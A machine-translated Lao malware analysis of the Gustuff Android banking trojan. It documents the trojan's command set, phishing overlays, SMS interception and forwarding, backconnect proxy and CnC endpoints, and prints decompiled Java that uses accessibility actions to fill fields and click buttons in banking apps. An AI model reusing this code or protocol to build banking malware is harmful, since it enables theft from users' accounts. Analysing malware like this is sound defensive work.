ປ່ອງຢ້ຽມ phishing ເປີດຂຶ້ນ, ເນື້ອໃນທີ່ດາວໂຫລດມາຈາກເຄື່ອງແມ່ຂ່າຍ <%url%>?id=<%Bot id%>&app=<%Application name%>
ປ່ອງຢ້ຽມ phishing ເປີດ, ປອມຕົວເປັນບັດ Google Play, ມີໂອກາດທີ່ຈະໃສ່ລາຍລະອຽດບັດ.

ຄໍາຮ້ອງສະຫມັກສົ່ງຜົນໄດ້ຮັບຂອງຄໍາສັ່ງໃດຫນຶ່ງກັບ <%CnC%>set_state.php ເປັນວັດຖຸ JSON ໃນຮູບແບບຕໍ່ໄປນີ້:

{
    "command":
    {
        "command":<%command%>,
        "id":<%command_id%>,
        "state":<%command_state%>
    }
    "id":<%bot_id%>
}

ການບໍລິການປະຕິບັດ
ບັນຊີລາຍຊື່ຂອງຄໍາສັ່ງທີ່ຂະບວນການຄໍາຮ້ອງສະຫມັກປະກອບມີ ການປະຕິບັດ. ເມື່ອໄດ້ຮັບຄໍາສັ່ງ, ໂມດູນການປະມວນຜົນຄໍາສັ່ງຈະເຂົ້າເຖິງການບໍລິການນີ້ເພື່ອປະຕິບັດຄໍາສັ່ງຂະຫຍາຍ. ບໍລິການຍອມຮັບວັດຖຸ JSON ເປັນພາລາມິເຕີ. ບໍລິການສາມາດປະຕິບັດຄໍາສັ່ງຕໍ່ໄປນີ້:

1. PARAMS_ACTION — ເມື່ອໄດ້ຮັບຄໍາສັ່ງດັ່ງກ່າວ, ການບໍລິການຄັ້ງທໍາອິດໄດ້ຮັບຈາກພາຣາມິເຕີ JSON ຄ່າຂອງຄໍາສັ່ງປະເພດ, ຊຶ່ງສາມາດເປັນດັ່ງຕໍ່ໄປນີ້:

ຂໍ້ມູນການບໍລິການ - ຄໍາສັ່ງຍ່ອຍໄດ້ຮັບຄ່າໂດຍຄີຈາກພາລາມິເຕີ JSON ລວມເຖິງບໍ່ສໍາຄັນ. ຖ້າທຸງແມ່ນຖືກຕ້ອງ, ແອັບພລິເຄຊັນຈະຕັ້ງທຸງ FLAG_ISOLATED_PROCESS ໃຫ້ກັບການບໍລິການທີ່ໃຊ້ບໍລິການເຂົ້າເຖິງ. ວິທີນີ້ການບໍລິການຈະຖືກເປີດຕົວໃນຂະບວນການແຍກຕ່າງຫາກ.
ຮາກ — ໄດ້ຮັບແລະສົ່ງໃຫ້ຂໍ້ມູນຂອງເຊີບເວີກ່ຽວກັບປ່ອງຢ້ຽມທີ່ກໍາລັງສຸມໃສ່ໃນປັດຈຸບັນ. ແອັບພລິເຄຊັນໄດ້ຮັບຂໍ້ມູນໂດຍໃຊ້ AccessibilityNodeInfo class.
admin - ຂໍສິດຜູ້ບໍລິຫານ.
ຊັກຊ້າ — suspend the ActionsService ສໍາລັບຈໍານວນ milliseconds ທີ່ລະບຸໄວ້ໃນພາລາມິເຕີສໍາລັບ "ຂໍ້ມູນ" ທີ່ສໍາຄັນ.
windows — ສົ່ງບັນຊີລາຍການຂອງປ່ອງຢ້ຽມສັງເກດເຫັນໃຫ້ຜູ້ໃຊ້ໄດ້.
ການຕິດຕັ້ງ — ຕິດຕັ້ງຄໍາຮ້ອງສະຫມັກໃນອຸປະກອນທີ່ຕິດເຊື້ອໄດ້. ຊື່ຂອງຊຸດແຟ້ມຈັດເກັບແມ່ນຢູ່ໃນປຸ່ມ "fileName". ແຟ້ມຈັດເກັບຕົວມັນເອງແມ່ນຢູ່ໃນໄດເລກະທໍລີດາວໂຫລດ.
ທົ່ວໂລກ - ຄໍາສັ່ງຍ່ອຍມີຈຸດປະສົງເພື່ອນໍາທາງຈາກປ່ອງຢ້ຽມປະຈຸບັນ:
- ຢູ່ໃນເມນູການຕັ້ງຄ່າດ່ວນ
- ກັບຄືນໄປບ່ອນ
- ບ້ານ
- ກັບການແຈ້ງການ
- ໄປຫາປ່ອງຢ້ຽມແອັບພລິເຄຊັນທີ່ເປີດບໍ່ດົນມານີ້
ເປີດຕົວ - ເປີດຕົວຄໍາຮ້ອງສະຫມັກ. ຊື່ແອັບພລິເຄຊັນມາເປັນຕົວກໍານົດການໂດຍຄີ ຂໍ້ມູນ.
ສຽງ — ປ່ຽນໂໝດສຽງເປັນຄວາມງຽບ.
ປົດລັອກ — ເປີດໄຟຫຼັງຂອງໜ້າຈໍ ແລະແປ້ນພິມໃຫ້ເປັນຄວາມສະຫວ່າງເຕັມ. ແອັບພລິເຄຊັນປະຕິບັດການປະຕິບັດນີ້ໂດຍໃຊ້ WakeLock, ລະບຸສາຍ [Application lable]: INFO ເປັນແທັກ
ອະນຸຍາດຊ້ອນ — ການທໍາງານແມ່ນບໍ່ໄດ້ປະຕິບັດ (ການຕອບສະຫນອງຕໍ່ການປະຕິບັດຄໍາສັ່ງແມ່ນ {"message":"ບໍ່ຮອງຮັບ"} ຫຼື {"message":"low sdk"})
gesture — ການທໍາງານແມ່ນບໍ່ໄດ້ປະຕິບັດ (ການຕອບສະຫນອງຕໍ່ການປະຕິບັດຄໍາສັ່ງແມ່ນ {"message":"ບໍ່ຮອງຮັບ"}ຫຼື {"message":"Low API"})
ການອະນຸຍາດ — ຄໍາສັ່ງນີ້ແມ່ນຈໍາເປັນເພື່ອຮ້ອງຂໍການອະນຸຍາດສໍາລັບຄໍາຮ້ອງສະຫມັກ. ຢ່າງໃດກໍ່ຕາມ, ຟັງຊັນສອບຖາມບໍ່ໄດ້ປະຕິບັດ, ດັ່ງນັ້ນຄໍາສັ່ງແມ່ນບໍ່ມີຄວາມຫມາຍ. ບັນຊີລາຍຊື່ຂອງສິດທິທີ່ຮ້ອງຂໍມາເປັນອາເຣ JSON ທີ່ມີປຸ່ມ "ສິດ". ບັນຊີລາຍຊື່ມາດຕະຖານ:
- android.permission.READ_PHONE_STATE
- android.permission.READ_CONTACTS
- android.permission.CALL_PHONE
- android.permission.RECEIVE_SMS
- android.permission.SEND_SMS
- android.permission.READ_SMS
- android.permission.READ_EXTERNAL_STORAGE
- android.permission.WRITE_EXTERNAL_STORAGE
ເປີດ — ສະແດງປ່ອງຢ້ຽມ phishing. ອີງຕາມພາລາມິເຕີທີ່ມາຈາກເຄື່ອງແມ່ຂ່າຍ, ແອັບພລິເຄຊັນອາດຈະສະແດງປ່ອງຢ້ຽມ phishing ຕໍ່ໄປນີ້:
- ສະແດງປ່ອງຢ້ຽມ phishing ທີ່ມີເນື້ອໃນຖືກຂຽນໄວ້ໃນໄຟລ໌ໃນໄດເລກະທໍລີ <%external directory%>/hgps/<%param_filename%>. ຜົນຂອງການໂຕ້ຕອບຂອງຜູ້ໃຊ້ກັບປ່ອງຢ້ຽມຈະຖືກສົ່ງໄປຫາ <%CnC%>/records.php
- ສະແດງປ່ອງຢ້ຽມ phishing ທີ່ມີເນື້ອຫາຖືກໂຫລດໄວ້ກ່ອນຈາກທີ່ຢູ່ <%url_param%>?id=<%bot_id%>&app=<%packagename%>. ຜົນຂອງການໂຕ້ຕອບຂອງຜູ້ໃຊ້ກັບປ່ອງຢ້ຽມຈະຖືກສົ່ງໄປຫາ <%CnC%>/records.php
- ສະແດງໜ້າຈໍຟິດຊິງທີ່ປອມຕົວເປັນບັດ Google Play.
ແບບໂຕ້ຕອບ — ຄໍາສັ່ງໄດ້ຖືກອອກແບບເພື່ອໂຕ້ຕອບກັບອົງປະກອບປ່ອງຢ້ຽມຂອງຄໍາຮ້ອງສະຫມັກອື່ນໆໂດຍນໍາໃຊ້ AcessibilityService. ການບໍລິການພິເສດໄດ້ຖືກປະຕິບັດຢູ່ໃນໂຄງການສໍາລັບການໂຕ້ຕອບ. ຄໍາຮ້ອງສະຫມັກທີ່ຢູ່ພາຍໃຕ້ການສືບສວນສາມາດພົວພັນກັບປ່ອງຢ້ຽມ:
- ປະຈຸບັນມີການເຄື່ອນໄຫວ. ໃນກໍລະນີນີ້, ພາລາມິເຕີປະກອບມີ id ຫຼືຂໍ້ຄວາມ (ຊື່) ຂອງວັດຖຸທີ່ທ່ານຕ້ອງການໂຕ້ຕອບກັບ.
- ເບິ່ງເຫັນໄດ້ຕໍ່ກັບຜູ້ໃຊ້ໃນເວລາທີ່ຄໍາສັ່ງຖືກປະຕິບັດ. ແອັບພລິເຄຊັນເລືອກ windows ໂດຍ id.
ໄດ້ຮັບວັດຖຸ AccessibilityNodeInfo ສໍາລັບອົງປະກອບຂອງປ່ອງຢ້ຽມທີ່ມີຄວາມສົນໃຈ, ຄໍາຮ້ອງສະຫມັກ, ອີງຕາມຕົວກໍານົດການ, ສາມາດດໍາເນີນການດັ່ງຕໍ່ໄປນີ້:
- focus — ຕັ້ງໂຟກັສໃສ່ວັດຖຸ.
- click — ຄລິກໃສ່ຈຸດປະສົງ.
- actionId — ປະຕິບັດການປະຕິບັດໂດຍ ID.
- setText — ປ່ຽນຂໍ້ຄວາມຂອງວັດຖຸ. ການປ່ຽນແປງຂໍ້ຄວາມແມ່ນເປັນໄປໄດ້ໃນສອງວິທີ: ດໍາເນີນການ ACTION_SET_TEXT (ຖ້າຫາກວ່າສະບັບ Android ຂອງອຸປະກອນທີ່ຕິດເຊື້ອແມ່ນນ້ອຍກ່ວາຫຼືເທົ່າກັບ LOLLIPOP), ຫຼືໂດຍການວາງສາຍໃສ່ໃນ clipboard ແລະວາງມັນເຂົ້າໄປໃນວັດຖຸ (ສໍາລັບຮຸ່ນເກົ່າ). ຄໍາສັ່ງນີ້ສາມາດຖືກນໍາໃຊ້ເພື່ອປ່ຽນຂໍ້ມູນໃນຄໍາຮ້ອງສະຫມັກທະນາຄານ.

2. PARAMS_ACTIONS - ຄືກັນກັບ PARAMS_ACTION, ມີພຽງແຕ່ອາເຣ JSON ຂອງຄໍາສັ່ງມາຮອດ.

ມັນເບິ່ງຄືວ່າປະຊາຊົນຈໍານວນຫຼາຍຈະມີຄວາມສົນໃຈໃນສິ່ງທີ່ຫນ້າທີ່ຂອງການພົວພັນກັບອົງປະກອບປ່ອງຢ້ຽມຂອງຄໍາຮ້ອງສະຫມັກອື່ນເບິ່ງຄືວ່າ. ນີ້ແມ່ນວິທີການປະຕິບັດຫນ້າທີ່ນີ້ຢູ່ໃນ Gustuff:

boolean interactiveAction(List aiList, JSONObject action, JsonObject res) {
    int count = action.optInt("repeat", 1);
    Iterator aiListIterator = ((Iterable)aiList).iterator();
    int count = 0;
    while(aiListIterator.hasNext()) {
        Object ani = aiListIterator.next();
        if(1 <= count) {
            int index;
            for(index = 1; true; ++index) {
                if(action.has("focus")) {
                    if(((AccessibilityNodeInfo)ani).performAction(1)) {
                        ++count;
                    }
                }
                else if(action.has("click")) {
                    if(((AccessibilityNodeInfo)ani).performAction(16)) {
                        ++count;
                    }
                }
                else if(action.has("actionId")) {
                    if(((AccessibilityNodeInfo)ani).performAction(action.optInt("actionId"))) {
                        ++count;
                    }
                }
                else if(action.has("setText")) {
                    customHeader ch = CustomAccessibilityService.a;
                    Context context = this.getApplicationContext();
                    String text = action.optString("setText");
                    if(performSetTextAction(ch, context, ((AccessibilityNodeInfo)ani), text)) {
                        ++count;
                    }
                }
                if(index == count) {
                    break;
                }
            }
        }
        ((AccessibilityNodeInfo)ani).recycle();
    }
    res.addPropertyNumber("res", Integer.valueOf(count));
}

ຟັງຊັນປ່ຽນຂໍ້ຄວາມ:

boolean performSetTextAction(Context context, AccessibilityNodeInfo ani, String text) {
    boolean result;
    if(Build$VERSION.SDK_INT >= 21) {
        Bundle b = new Bundle();
        b.putCharSequence("ACTION_ARGUMENT_SET_TEXT_CHARSEQUENCE", ((CharSequence)text));
        result = ani.performAction(0x200000, b);  // ACTION_SET_TEXT
    }
    else {
        Object clipboard = context.getSystemService("clipboard");
        if(clipboard != null) {
        ((ClipboardManager)clipboard).setPrimaryClip(ClipData.newPlainText("autofill_pm", ((CharSequence)text)));
        result = ani.performAction(0x8000);  // ACTION_PASTE
        }
        else {
            result = false;
        }
    }
    return result;
}

ດັ່ງນັ້ນ, ດ້ວຍການຕັ້ງຄ່າທີ່ຖືກຕ້ອງຂອງເຄື່ອງແມ່ຂ່າຍການຄວບຄຸມ, Gustuff ສາມາດຕື່ມຂໍ້ມູນໃສ່ຊ່ອງຂໍ້ຄວາມໃນຄໍາຮ້ອງສະຫມັກທະນາຄານແລະຄລິກໃສ່ປຸ່ມທີ່ຈໍາເປັນເພື່ອເຮັດທຸລະກໍາ. Trojan ບໍ່ຈໍາເປັນຕ້ອງເຂົ້າສູ່ລະບົບແອັບພລິເຄຊັນ - ມັນພຽງພໍທີ່ຈະສົ່ງຄໍາສັ່ງເພື່ອສະແດງການແຈ້ງເຕືອນ PUSH ແລະຫຼັງຈາກນັ້ນເປີດແອັບພລິເຄຊັນທະນາຄານທີ່ຕິດຕັ້ງກ່ອນຫນ້ານີ້. ຜູ້ໃຊ້ຈະຢືນຢັນຕົນເອງ, ຫຼັງຈາກນັ້ນ Gustuff ຈະສາມາດຕື່ມຂໍ້ມູນໃສ່ລົດໄດ້.

ໂມດູນການປະມວນຜົນຂໍ້ຄວາມ SMS

ແອັບພລິເຄຊັນຕິດຕັ້ງຕົວຈັດການເຫດການສໍາລັບອຸປະກອນທີ່ຕິດເຊື້ອເພື່ອຮັບເອົາຂໍ້ຄວາມ SMS. ຄໍາຮ້ອງສະຫມັກພາຍໃຕ້ການສຶກສາສາມາດໄດ້ຮັບຄໍາສັ່ງຈາກຜູ້ປະຕິບັດການ, ເຊິ່ງມາຢູ່ໃນຮ່າງກາຍຂອງຂໍ້ຄວາມ SMS. ຄໍາສັ່ງມາໃນຮູບແບບ:

7!5=<%Base64 ຄໍາສັ່ງເຂົ້າລະຫັດ%>

ແອັບພລິເຄຊັ່ນຊອກຫາສາຍໃນທຸກຂໍ້ຄວາມ SMS ຂາເຂົ້າ 7!5=, ເມື່ອ string ຖືກກວດພົບ, ມັນຈະຖອດລະຫັດ string ຈາກ Base64 ຢູ່ທີ່ offset 4 ແລະປະຕິບັດຄໍາສັ່ງ. ຄໍາສັ່ງແມ່ນຄ້າຍຄືກັບ CnC. ຜົນໄດ້ຮັບການປະຕິບັດແມ່ນຖືກສົ່ງໄປຫາຕົວເລກດຽວກັນທີ່ຄໍາສັ່ງມາ. ຮູບແບບການຕອບສະຫນອງ:

7*5=<%Base64 encode ຂອງ “result_code command”%>

ທາງເລືອກອື່ນ, ແອັບພລິເຄຊັນສາມາດສົ່ງຂໍ້ຄວາມທີ່ໄດ້ຮັບທັງຫມົດໄປຫາຈໍານວນຮາກ. ເພື່ອເຮັດສິ່ງນີ້, ຈໍານວນຮາກຕ້ອງໄດ້ຮັບການລະບຸໄວ້ໃນໄຟລ໌ທີ່ຕ້ອງການແລະທຸງການປ່ຽນເສັ້ນທາງຂໍ້ຄວາມຕ້ອງຖືກຕັ້ງ. ຂໍ້ຄວາມ SMS ຖືກສົ່ງໄປຫາເບີຂອງຜູ້ໂຈມຕີໃນຮູບແບບ:

<%From number%> - <%Time, format: dd/MM/yyyy HH:mm:ss%> <%SMS body%>

ນອກຈາກນີ້, ທາງເລືອກ, ຄໍາຮ້ອງສະຫມັກສາມາດສົ່ງຂໍ້ຄວາມໄປຫາ CnC. ຂໍ້ຄວາມ SMS ຖືກສົ່ງໄປຫາເຄື່ອງແມ່ຂ່າຍໃນຮູບແບບ JSON:

{
    "id":<%BotID%>,
    "sms":
    {
        "text":<%SMS body%>,
        "number":<%From number%>,
        "date":<%Timestamp%>
    }
}

ຖ້າທຸງຖືກຕັ້ງ nameGenerator("DEFAULT_APP_SMS") – ແອັບພລິເຄຊັນຢຸດການປະມວນຜົນຂໍ້ຄວາມ SMS ແລະລຶບລາຍຊື່ຂໍ້ຄວາມທີ່ເຂົ້າມາ.

ໂມດູນຕົວແທນ

ແອັບພລິເຄຊັນທີ່ກໍາລັງສຶກສາຢູ່ມີໂມດູນ Backconnect Proxy (ຕໍ່ໄປນີ້ເອີ້ນວ່າໂມດູນ Proxy), ເຊິ່ງມີຫ້ອງຮຽນແຍກຕ່າງຫາກທີ່ປະກອບມີຊ່ອງຂໍ້ມູນຄົງທີ່ກັບການຕັ້ງຄ່າ. ຂໍ້ມູນການຕັ້ງຄ່າຖືກເກັບໄວ້ໃນຕົວຢ່າງໃນຮູບແບບທີ່ຈະແຈ້ງ:

ການກະທຳທັງໝົດທີ່ເຮັດໂດຍໂມດູນພຣັອກຊີແມ່ນເຂົ້າລະບົບໄຟລ໌. ເພື່ອເຮັດສິ່ງນີ້, ແອັບພລິເຄຊັນໃນບ່ອນເກັບຂໍ້ມູນພາຍນອກຈະສ້າງໄດເລກະທໍລີທີ່ເອີ້ນວ່າ "ບັນທຶກ" (ພາກສະຫນາມ ProxyConfigClass.logsDir ໃນຫ້ອງຮຽນການຕັ້ງຄ່າ), ເຊິ່ງໄຟລ໌ບັນທຶກຖືກເກັບໄວ້. ການບັນທຶກເກີດຂຶ້ນໃນໄຟລ໌ທີ່ມີຊື່:

main.txt - ການເຮັດວຽກຂອງຫ້ອງຮຽນທີ່ເອີ້ນວ່າ CommandServer ແມ່ນເຂົ້າສູ່ລະບົບໄຟລ໌ນີ້. ໃນສິ່ງທີ່ຕໍ່ໄປນີ້, ການບັນທຶກ str str ເຂົ້າໄປໃນໄຟລ໌ນີ້ຈະຖືກສະແດງເປັນ mainLog(str).
session-<%id%>.txt — ໄຟລ໌ນີ້ບັນທຶກຂໍ້ມູນບັນທຶກທີ່ກ່ຽວຂ້ອງກັບເຊດຊັນຕົວແທນສະເພາະ. ໃນສິ່ງທີ່ຕໍ່ໄປນີ້, ການບັນທຶກ str str ກັບໄຟລ໌ນີ້ຈະຖືກສະແດງເປັນ sessionLog (str).
server.txt - ໄຟລ໌ນີ້ຖືກນໍາໃຊ້ເພື່ອບັນທຶກຂໍ້ມູນທັງຫມົດທີ່ຂຽນໄວ້ໃນໄຟລ໌ທີ່ອະທິບາຍຂ້າງເທິງ.

ຮູບແບບຂໍ້ມູນບັນທຶກ:

<%Date%> [Thread[<%thread id%>], id[]]: log-string

ຂໍ້ຍົກເວັ້ນທີ່ເກີດຂື້ນໃນລະຫວ່າງການປະຕິບັດງານຂອງໂມດູນ Proxy ແມ່ນຍັງຖືກບັນທຶກເຂົ້າໄປໃນໄຟລ໌. ເພື່ອເຮັດສິ່ງນີ້, ແອັບພລິເຄຊັນຈະສ້າງວັດຖຸ JSON ໃນຮູບແບບຕໍ່ໄປນີ້:

{
    "uncaughtException":<%short description of throwable%>
    "thread":<%thread%>
    "message":<%detail message of throwable%>
    "trace":        //Stack trace info
        [
            {
                "ClassName":
                "FileName":
                "LineNumber":
                "MethodName":
            },
            {
                "ClassName":
                "FileName":
                "LineNumber":
                "MethodName":
            }
        ]
}

ຫຼັງຈາກນັ້ນ, ມັນປ່ຽນເປັນຕົວແທນສະຕຣິງແລະບັນທຶກມັນ.

ໂມດູນ Proxy ຖືກເປີດຕົວຫຼັງຈາກໄດ້ຮັບຄໍາສັ່ງທີ່ສອດຄ້ອງກັນ. ເມື່ອໄດ້ຮັບຄໍາສັ່ງເພື່ອເປີດໃຊ້ໂມດູນ Proxy, ແອັບພລິເຄຊັນຈະເລີ່ມບໍລິການທີ່ເອີ້ນວ່າ ການບໍລິການຫຼັກ, ເຊິ່ງຮັບຜິດຊອບໃນການຄຸ້ມຄອງການດໍາເນີນງານຂອງໂມດູນ Proxy - ເລີ່ມຕົ້ນແລະຢຸດມັນ.

ຂັ້ນຕອນຂອງການເລີ່ມຕົ້ນການບໍລິການ:

1. ເລີ່ມໂມງຈັບເວລາທີ່ແລ່ນເທື່ອລະນາທີ ແລະກວດເບິ່ງການເຄື່ອນໄຫວຂອງໂມດູນພຣັອກຊີ. ຖ້າໂມດູນບໍ່ເຄື່ອນໄຫວ, ມັນຈະເລີ່ມມັນ.
ເມື່ອເຫດການຖືກກະຕຸ້ນ android.net.conn.CONNECTIVITY_CHANGE ໂມດູນ Proxy ຖືກເປີດຕົວ.

2. ແອັບພລິເຄຊັນສ້າງ wake-lock ກັບພາລາມິເຕີ PARTIAL_WAKE_LOCK ແລະຈັບລາວ. ອັນນີ້ປ້ອງກັນບໍ່ໃຫ້ CPU ຂອງອຸປະກອນເຂົ້າສູ່ໂໝດນອນຫຼັບ.

3. ເປີດຫ້ອງຮຽນການປະມວນຜົນຄຳສັ່ງຂອງໂມດູນພຣັອກຊີ, ທຳອິດໃຫ້ບັນທຶກແຖວ mainLog("ເຄື່ອງແມ່ຂ່າຍເລີ່ມຕົ້ນ") и

ເຊີບເວີ::start() host[<%proxy_cnc%>], commandPort[<%command_port%>], proxyPort[<%proxy_port%>]

ບ່ອນທີ່ proxy_cnc, command_port ແລະ proxy_port – ພາລາມິເຕີທີ່ໄດ້ຮັບຈາກການຕັ້ງຄ່າເຊີບເວີພຣັອກຊີ.

ຫ້ອງຮຽນປະມວນຜົນຄໍາສັ່ງແມ່ນເອີ້ນວ່າ ການເຊື່ອມຕໍ່ຄໍາສັ່ງ. ທັນທີຫຼັງຈາກການເລີ່ມຕົ້ນ, ດໍາເນີນການດັ່ງຕໍ່ໄປນີ້:

4. ເຊື່ອມຕໍ່ກັບ ProxyConfigClass.host: ProxyConfigClass.commandPort ແລະສົ່ງຂໍ້ມູນກ່ຽວກັບອຸປະກອນທີ່ຕິດເຊື້ອຢູ່ທີ່ນັ້ນໃນຮູບແບບ JSON:

{
    "id":<%id%>,
    "imei":<%imei%>,
    "imsi":<%imsi%>,
    "model":<%model%>,
    "manufacturer":<%manufacturer%>,
    "androidVersion":<%androidVersion%>,
    "country":<%country%>,
    "partnerId":<%partnerId%>,
    "packageName":<%packageName%>,
    "networkType":<%networkType%>,
    "hasGsmSupport":<%hasGsmSupport%>,
    "simReady":<%simReady%>,
    "simCountry":<%simCountry%>,
    "networkOperator":<%networkOperator%>,
    "simOperator":<%simOperator%>,
    "version":<%version%>
}

ບ່ອນທີ່:

id – ຕົວລະບຸ, ພະຍາຍາມເອົາຄ່າທີ່ມີຊ່ອງໃສ່ຂໍ້ມູນ “id” ຈາກໄຟລ໌ການຕັ້ງຄ່າທີ່ແບ່ງປັນຊື່ “x”. ຖ້າບໍ່ສາມາດໄດ້ຮັບຄ່ານີ້, ມັນຈະສ້າງອັນໃຫມ່. ດັ່ງນັ້ນ, ໂມດູນ Proxy ມີຕົວລະບຸຂອງຕົນເອງ, ເຊິ່ງຖືກສ້າງຂື້ນຄືກັນກັບ Bot ID.
imei — IMEI ຂອງອຸປະກອນ. ຖ້າມີຂໍ້ຜິດພາດເກີດຂຶ້ນໃນລະຫວ່າງຂະບວນການໄດ້ຮັບຄ່າ, ຂໍ້ຄວາມສະແດງຂໍ້ຜິດພາດຈະຖືກຂຽນແທນຊ່ອງຂໍ້ມູນນີ້.
imsi — ຕົວຕົນຜູ້ຈອງມືຖືສາກົນຂອງອຸປະກອນ. ຖ້າມີຂໍ້ຜິດພາດເກີດຂຶ້ນໃນລະຫວ່າງຂະບວນການໄດ້ຮັບຄ່າ, ຂໍ້ຄວາມສະແດງຂໍ້ຜິດພາດຈະຖືກຂຽນແທນຊ່ອງຂໍ້ມູນນີ້.
ຕົວແບບ — ຊື່ທີ່ຜູ້ໃຊ້ສາມາດເຫັນໄດ້ສໍາລັບຜະລິດຕະພັນສຸດທ້າຍ.
ຜູ້ຜະລິດ — ຜູ້ຜະລິດຜະລິດຕະພັນ/ຮາດແວ (Build.MANUFACTURER).
androidVersion - ສະຕຣິງໃນຮູບແບບ "<%release_version%> (<%os_version%>),<%sdk_version%>"
ປະເທດ — ທີ່ຕັ້ງປະຈຸບັນຂອງອຸປະກອນ.
PartnerId ແມ່ນສະຕຣິງຫວ່າງເປົ່າ.
packageName – ຊື່ຊຸດ.
ປະເພດເຄືອຂ່າຍ — ປະເພດຂອງການເຊື່ອມຕໍ່ເຄືອຂ່າຍປະຈຸບັນ (ຕົວຢ່າງ: “WIFI”, “ມືຖື”). ໃນກໍລະນີຂອງຄວາມຜິດພາດ, ໃຫ້ກັບຄືນ null.
hasGsmSupport – true – ຖ້າໂທລະສັບຮອງຮັບ GSM, ຖ້າບໍ່ດັ່ງນັ້ນ false.
simReady – ສະຖານະ SIM card.
simCountry - ລະຫັດປະເທດ ISO (ອີງຕາມຜູ້ໃຫ້ບໍລິການຊິມກາດ).
networkOperator — ຊື່ operator. ຖ້າມີຂໍ້ຜິດພາດເກີດຂຶ້ນໃນລະຫວ່າງຂະບວນການໄດ້ຮັບຄ່າ, ຂໍ້ຄວາມສະແດງຂໍ້ຜິດພາດຈະຖືກຂຽນແທນຊ່ອງຂໍ້ມູນນີ້.
simOperator — ຊື່ຜູ້ໃຫ້ບໍລິການ (SPN). ຖ້າມີຂໍ້ຜິດພາດເກີດຂຶ້ນໃນລະຫວ່າງຂະບວນການໄດ້ຮັບຄ່າ, ຂໍ້ຄວາມສະແດງຂໍ້ຜິດພາດຈະຖືກຂຽນແທນຊ່ອງຂໍ້ມູນນີ້.
ສະບັບ - ພາກສະຫນາມນີ້ຖືກເກັບໄວ້ໃນຫ້ອງຮຽນ config;

5. ສະຫຼັບກັບໂໝດລໍຖ້າຄຳສັ່ງຈາກເຊີບເວີ. ຄໍາສັ່ງຈາກເຄື່ອງແມ່ຂ່າຍມາໃນຮູບແບບ:

0 offset – ຄໍາສັ່ງ
1 ຊົດເຊີຍ – sessionId
2 ຊົດເຊີຍ – ຄວາມຍາວ
4 offset - ຂໍ້ມູນ

ເມື່ອຄໍາສັ່ງມາຮອດ, ແອັບພລິເຄຊັນຈະບັນທຶກ:
mainLog("Header { sessionId<%id%>], type[<%command%>], length[<%length%>] }")

ຄໍາສັ່ງຕໍ່ໄປນີ້ຈາກເຄື່ອງແມ່ຂ່າຍແມ່ນເປັນໄປໄດ້:

ຊື່	ຄໍາສັ່ງ	ຂໍ້ມູນ	ລາຍລະອຽດ
ໄອດີການເຊື່ອມຕໍ່	0	ID ການເຊື່ອມຕໍ່	ສ້າງການເຊື່ອມຕໍ່ໃຫມ່
ນອນ	3	ທີ່ໃຊ້ເວລາ	ຢຸດໂມດູນພຣັອກຊີຊົ່ວຄາວ
ປິ່ງປ່ອງ	4	-	ສົ່ງຂໍ້ຄວາມ PONG

ຂໍ້ຄວາມ PONG ປະກອບດ້ວຍ 4 bytes ແລະມີລັກສະນະນີ້: 0x04000000.

ເມື່ອໄດ້ຮັບຄໍາສັ່ງ connectionId (ເພື່ອສ້າງການເຊື່ອມຕໍ່ໃຫມ່) ການເຊື່ອມຕໍ່ຄໍາສັ່ງ ສ້າງຕົວຢ່າງຂອງຫ້ອງຮຽນ ການເຊື່ອມຕໍ່ພຣັອກຊີ.

ສອງຫ້ອງຮຽນມີສ່ວນຮ່ວມໃນການເປັນຕົວແທນ: ການເຊື່ອມຕໍ່ພຣັອກຊີ и ໃນຕອນທ້າຍ. ເມື່ອສ້າງຫ້ອງຮຽນ ການເຊື່ອມຕໍ່ພຣັອກຊີ ການເຊື່ອມຕໍ່ກັບທີ່ຢູ່ ProxyConfigClass.host: ProxyConfigClass.proxyPort ແລະຖ່າຍທອດວັດຖຸ JSON:

 {
    "id":<%connectionId%>
}

ໃນການຕອບສະຫນອງ, ເຄື່ອງແມ່ຂ່າຍສົ່ງຂໍ້ຄວາມ SOCKS5 ທີ່ມີທີ່ຢູ່ຂອງເຄື່ອງແມ່ຂ່າຍຫ່າງໄກສອກຫຼີກທີ່ການເຊື່ອມຕໍ່ຕ້ອງໄດ້ຮັບການສ້າງຕັ້ງຂຶ້ນ. ການໂຕ້ຕອບກັບເຄື່ອງແມ່ຂ່າຍນີ້ເກີດຂຶ້ນໂດຍຜ່ານຫ້ອງຮຽນ ໃນຕອນທ້າຍ. ການຕິດຕັ້ງການເຊື່ອມຕໍ່ສາມາດເປັນຕົວແທນ schematically ດັ່ງຕໍ່ໄປນີ້:

ການໂຕ້ຕອບຂອງເຄືອຂ່າຍ

ເພື່ອປ້ອງກັນການວິເຄາະການຈະລາຈອນໂດຍເຄືອຂ່າຍ sniffers, ການໂຕ້ຕອບລະຫວ່າງເຊີບເວີ CnC ແລະແອັບພລິເຄຊັນສາມາດໄດ້ຮັບການປົກປ້ອງໂດຍໃຊ້ໂປໂຕຄອນ SSL. ຂໍ້ມູນທັງຫມົດທີ່ຖືກສົ່ງທັງຈາກແລະໄປທີ່ເຊີບເວີແມ່ນນໍາສະເຫນີໃນຮູບແບບ JSON. ແອັບພລິເຄຊັນປະຕິບັດການຮ້ອງຂໍຕໍ່ໄປນີ້ໃນລະຫວ່າງການປະຕິບັດງານ:

http://<%CnC%>/api/v1/set_state.php - ຜົນຂອງການປະຕິບັດຄໍາສັ່ງ.
http://<%CnC%>/api/v1/get.php — ໄດ້ຮັບຄໍາສັ່ງ.
http://<%CnC%>/api/v1/load_sms.php — ການດາວໂຫຼດຂໍ້ຄວາມ SMS ຈາກອຸປະກອນທີ່ຕິດເຊື້ອ.
http://<%CnC%>/api/v1/load_ab.php — ການອັບໂຫຼດລາຍຊື່ຂອງການຕິດຕໍ່ຈາກອຸປະກອນທີ່ຕິດເຊື້ອ.
http://<%CnC%>/api/v1/aevents.php - ການຮ້ອງຂໍແມ່ນເຮັດໃນເວລາທີ່ການປັບປຸງພາລາມິເຕີທີ່ຢູ່ໃນໄຟລ໌ທີ່ຕ້ອງການ.
http://<%CnC%>/api/v1/set_card.php — ການອັບໂຫຼດຂໍ້ມູນທີ່ໄດ້ຮັບໂດຍການນໍາໃຊ້ປ່ອງຢ້ຽມ phishing ປອມເປັນ Google Play Market.
http://<%CnC%>/api/v1/logs.php - ການອັບໂຫຼດຂໍ້ມູນບັນທຶກ.
http://<%CnC%>/api/v1/records.php - ອັບໂຫຼດຂໍ້ມູນທີ່ໄດ້ຮັບຜ່ານໜ້າຕ່າງຟິດຊິງ.
